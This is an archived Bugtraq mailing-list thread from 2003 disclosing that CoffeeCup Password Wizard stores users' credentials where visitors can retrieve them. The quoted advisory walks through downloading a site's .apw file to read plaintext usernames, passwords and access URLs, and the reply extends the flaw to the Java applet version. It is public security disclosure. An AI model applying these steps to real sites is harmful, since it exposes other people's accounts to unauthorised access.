Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions
From: "Per-Ola Kristiansson" <admin () swesign com>
Date: Mon, 3 Mar 2003 01:08:59 +0100

The Java version is also vulnerable. The username, password and secret url
can be extracted from the param "0" in the html code. I wrote a small
program for this purpose a couple of months ago.

Password Wizard java sample: http://www.coffeecup.com/java-password/samples/

<applet code="joylock.class" width=342 height=140>
<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD
WWW.COFFEECUP.COM">
<param name="GENERAL"
value="1|11|004080|FFFFFF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny
/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
<param name="0"
value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe
/enyyvw.zcev">
</applet>

Best regards,
Per-Ola Kristiansson


----- Original Message -----
From: "Rynho Zeros Web" <hackargentino () gmx net>
To: <bugtraq () securityfocus com>
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions


+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions

+ Product: CoffeeCup Password Wizard All Versions

+ Vendor: CoffeeCup Software, Inc.

+ Site: http://www.coffeecup.com/java-password/

+ About CoffeeCup Password Wizard: Create unlimited password protected
pages

with unlimited usernames and passwords with CoffeeCup Password Wizard.
You don't even have to know Flash, Java, or HTML ! Customize the look and
feel to match your page. You can even point different users to different
URLs ! Preview within the program or your favorite browser. It's all that
easy ! All this and more make CoffeeCup Password Wizard the easiest way
to password protect your pages ! (¿?)

+ Description: Easy obtaining of names of users, passwords and a URL
 of direct access to the preferences of the same one.

+ Exploit:

go to the login panel, see sourcecode HTML in search of the location
of the file .swf used to make login.

Example:

Go to
https://www.victim.com/billing/

See sourcecode,

[...]
        ID=billing WIDTH=146 HEIGHT=125>
        <PARAM NAME=movie VALUE="billing.swf">
        <PARAM NAME=quality VALUE=high>
[...]

(https://www.victim.com/billing/billing.swf)

the file of the passwords is called just as the file of login, but with
the extension .apw

now, go to & download the file:
https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
Wizard File)

by I complete it opens east file with any text editor and found all the
users
with its passwords and the URL of direct access to its options.

Example of passwords file:

--------- billing.apw -----------

COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!

MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billing\
MOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE

USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username

PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password

BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1

ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
[...]
END

--------- billing.apw -----------

Example of user & pass on billing:

user: anyweb
pass: xnet0305
url option panel: https://www.victim.com/billing/anyweb0001.htm


----------------------------------------------------------------

[EOF]

-----------------------------------------------
Credits: ToOcOoL (http://www.valenciahack.com/)
-----------------------------------------------

--------------------------------
Note: sorry by my bad english ;)
--------------------------------

--
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Attachment: passwiz.c
Description:


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault